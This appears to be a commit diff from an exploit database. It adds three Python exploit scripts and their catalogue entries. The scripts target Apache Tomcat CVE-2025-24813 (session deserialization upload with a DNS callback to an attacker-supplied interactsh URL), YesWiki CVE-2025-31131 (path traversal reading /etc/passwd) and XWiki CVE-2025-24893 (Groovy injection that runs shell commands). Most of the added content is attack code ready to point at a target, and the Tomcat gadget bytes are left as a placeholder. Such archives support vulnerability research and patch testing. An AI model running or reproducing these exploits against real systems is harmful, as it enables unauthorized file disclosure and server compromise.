DB: 2025-04-08

4 changes to exploits/shellcodes/ghdb

Apache Tomcat 11.0.3 - Remote Code Execution

XWiki Platform 15.10.10 - Remote Code Execution

YesWiki 4.5.1 - Unauthenticated Path Traversal

exploits/multiple/webapps/52134.txt

@@ -0,0 +1,63 @@
+# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
+# Exploit Author: Al Baradi Joy
+# CVE: CVE-2025-24813
+# Date: 2025-04-06
+# Vendor Homepage: https://tomcat.apache.org/
+# Software Link: https://tomcat.apache.org/download-90.cgi
+# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
+# Tested on: Apache Tomcat 10.1.33
+# CVSS: 9.8 (CRITICAL)
+# CWE: CWE-44, CWE-502
+# Reference:
+https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
+
+import requests
+import random
+import string
+import sys
+
+def rand_filename(length=6):
+    return ''.join(random.choices(string.ascii_lowercase, k=length))
+
+def generate_payload(interact_url):
+    # Java serialized payload gadget triggering DNS interaction
+    return f'\xac\xed\x00\x05...'  # Replace with actual gadget bytes or
+generator
+
+def exploit(target, interact_url):
+    filename = rand_filename()
+    put_url = f"{target}/{filename}.session"
+    get_url = f"{target}/{filename}"
+    headers = {
+        "Content-Range": "bytes 0-452/457",
+        "Content-Type": "application/octet-stream"
+    }
+    payload = generate_payload(interact_url)
+
+    print("[+] Exploit for CVE-2025-24813")
+    print("[+] Made By Al Baradi Joy\n")
+    print(f"[+] Uploading payload to: {put_url}")
+    r1 = requests.put(put_url, data=payload, headers=headers)
+    if r1.status_code == 201:
+        print("[+] Payload uploaded successfully.")
+    else:
+        print(f"[-] Upload failed with status: {r1.status_code}")
+        return
+
+    print(f"[+] Triggering payload via: {get_url}")
+    cookies = {"JSESSIONID": f".{filename}"}
+    r2 = requests.get(get_url, cookies=cookies)
+    print(f"[+] Trigger request sent. Check for DNS callback to:
+{interact_url}")
+
+if __name__ == "__main__":
+    # Display banner first
+    print("[+] Exploit for CVE-2025-24813")
+    print("[+] Made By Al Baradi Joy\n")
+
+    # Ask the user for the target domain and interact URL
+    target_url = input("Enter the target domain (e.g., http://localhost:8080):
+")
+    interact_url = input("Enter your interactsh URL: ")
+
+    exploit(target_url, interact_url)

exploits/multiple/webapps/52135.txt

@@ -0,0 +1,64 @@
+# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
+# Exploit Author: Al Baradi Joy
+# Exploit Date: April 6, 2025
+# CVE ID: CVE-2025-31131
+# Vendor Homepage: https://yeswiki.net/
+# Software Link: https://github.com/YesWiki/yeswiki
+# Affected Version: < 4.5.2
+# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
+# Vulnerability Type: Unauthenticated Path Traversal (LFI)
+# CVSS Score: 8.6 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+# Description:
+#   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
+traversal via the 'squelette' parameter.
+#   A remote attacker can exploit this issue to read arbitrary files on the
+server, such as /etc/passwd.
+
+import requests
+import sys
+
+def banner():
+    print("=" * 80)
+    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
+(CVE-2025-31131)")
+    print(" Exploit Author: Al Baradi Joy")
+    print("=" * 80)
+
+def exploit(target, filename="/etc/passwd"):
+    if not target.startswith("http"):
+        target = "http://" + target
+
+    traversal = "../" * 8
+    encoded_file = filename.replace("/", "%2f")
+    payload =
+f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
+    url = target.rstrip("/") + payload
+
+    try:
+        print(f"[+] Target: {target}")
+        print(f"[+] Attempting to read: {filename}")
+        response = requests.get(url, timeout=10)
+
+        if response.status_code == 200 and "root:" in response.text:
+            print("[+] Exploit successful. File contents:\n")
+            print(response.text)
+        else:
+            print("[!] Exploit failed or file not readable.")
+            print(f"Status Code: {response.status_code}")
+            if len(response.text) < 200:
+                print(f"Response:\n{response.text}")
+    except requests.exceptions.RequestException as e:
+        print(f"[!] Request failed: {e}")
+
+if __name__ == "__main__":
+    banner()
+    if len(sys.argv) < 2:
+        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
+        print(f"Example: python3 {sys.argv[0]} http://victim.com
+/etc/passwd")
+        sys.exit(1)
+
+    target_url = sys.argv[1]
+    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
+    exploit(target_url, file_to_read)

exploits/multiple/webapps/52136.txt

@@ -0,0 +1,97 @@
+# Exploit Title: XWiki Platform - Remote Code Execution
+# Exploit Author: Al Baradi Joy
+# Exploit Date: April 6, 2025
+# CVE ID: CVE-2025-24893
+# Vendor Homepage: https://www.xwiki.org/
+# Software Link: https://github.com/xwiki/xwiki-platform
+# Version: Affected versions up to and including XWiki 15.10.10
+# Tested Versions: XWiki 15.10.10
+# Vulnerability Type: Remote Code Execution (RCE)
+# CVSS Score: 9.8 (Critical)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+# Description:
+# XWiki Platform suffers from a critical vulnerability where any guest user
+can
+# execute arbitrary code remotely through the SolrSearch endpoint. This can
+lead
+# to a full server compromise, including the ability to execute commands on
+the
+# underlying system. The vulnerability impacts the confidentiality,
+integrity,
+# and availability of the XWiki installation. The issue has been patched in
+XWiki
+# versions 15.10.11, 16.4.1, and 16.5.0RC1.
+# Proof of Concept: Yes
+# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
+# References:
+# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
+# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
+# - GitHub Exploit Link:
+https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
+
+import requests
+
+# Banner
+def display_banner():
+print("="*80)
+print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code
+Execution")
+print("Exploit Author: Al Baradi Joy")
+print("GitHub Exploit:
+https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
+print("="*80)
+
+# Function to detect the target protocol (HTTP or HTTPS)
+def detect_protocol(domain):
+https_url = f"https://{domain}"
+http_url = f"http://{domain}"
+
+try:
+response = requests.get(https_url, timeout=5, allow_redirects=True)
+if response.status_code < 400:
+print(f"[✔] Target supports HTTPS: {https_url}")
+return https_url
+except requests.exceptions.RequestException:
+print("[!] HTTPS not available, falling back to HTTP.")
+
+try:
+response = requests.get(http_url, timeout=5, allow_redirects=True)
+if response.status_code < 400:
+print(f"[✔] Target supports HTTP: {http_url}")
+return http_url
+except requests.exceptions.RequestException:
+print("[✖] Target is unreachable on both HTTP and HTTPS.")
+exit(1)
+
+# Exploit function
+def exploit(target_url):
+target_url = detect_protocol(target_url.replace("http://",
+"").replace("https://", "").strip())
+exploit_url =
+f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
+
+try:
+print(f"[+] Sending request to: {exploit_url}")
+response = requests.get(exploit_url, timeout=10)
+
+# Check if the exploit was successful
+if response.status_code == 200 and "root:" in response.text:
+print("[✔] Exploit successful! Output received:")
+print(response.text)
+else:
+print(f"[✖] Exploit failed. Status code:
+{response.status_code}")
+
+except requests.exceptions.ConnectionError:
+print("[✖] Connection failed. Target may be down.")
+except requests.exceptions.Timeout:
+print("[✖] Request timed out. Target is slow or unresponsive.")
+except requests.exceptions.RequestException as e:
+print(f"[✖] Unexpected error: {e}")
+
+# Main execution
+if __name__ == "__main__":
+display_banner()
+target = input("[?] Enter the target URL (without http/https):
+").strip()
+exploit(target)

files_exploits.csv

@@ -11708,6 +11708,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,,
 48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py
 49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,,
+52134,exploits/multiple/webapps/52134.txt,"Apache Tomcat 11.0.3 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24813,,,,,
 10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz,
 29435,exploits/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",webapps,multiple,,2013-11-06,2013-11-06,0,CVE-2013-6357;OSVDB-99375,,,,,http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
 50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",2021-07-13,"Central InfoSec",webapps,multiple,,2021-07-13,2021-07-13,0,CVE-2019-0221,,,,,
@@ -12427,7 +12428,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
 49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,,2021-01-18,2021-01-18,0,,,,,,
+52136,exploits/multiple/webapps/52136.txt,"XWiki Platform 15.10.10 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24893,,,,,
 17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",webapps,multiple,,2011-04-04,2016-10-27,0,OSVDB-78072;OSVDB-71717;OSVDB-71716;CVE-2011-5025;OSVDB-71715,,,,http://www.exploit-db.comyaws-1.88.tar.gz,https://sitewat.ch/en/Advisory/4
+52135,exploits/multiple/webapps/52135.txt,"YesWiki 4.5.1 - Unauthenticated Path Traversal",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-31131,,,,,
 10752,exploits/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,webapps,multiple,80,2009-12-27,,0,,,,,,
 10431,exploits/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,webapps,multiple,80,2009-12-13,,1,CVE-2009-4502;OSVDB-60956,,,,http://www.exploit-db.comzabbix_agents_1.1_Solaris5.9_i386.tar_.gz,
 10432,exploits/multiple/webapps/10432.txt,"Zabbix Server - Multiple Vulnerabilities",2009-12-14,Nicob,webapps,multiple,80,2009-12-13,2016-10-27,1,CVE-2009-4501;CVE-2009-4499;CVE-2009-4498;OSVDB-60968;OSVDB-60966;OSVDB-60965,,,,,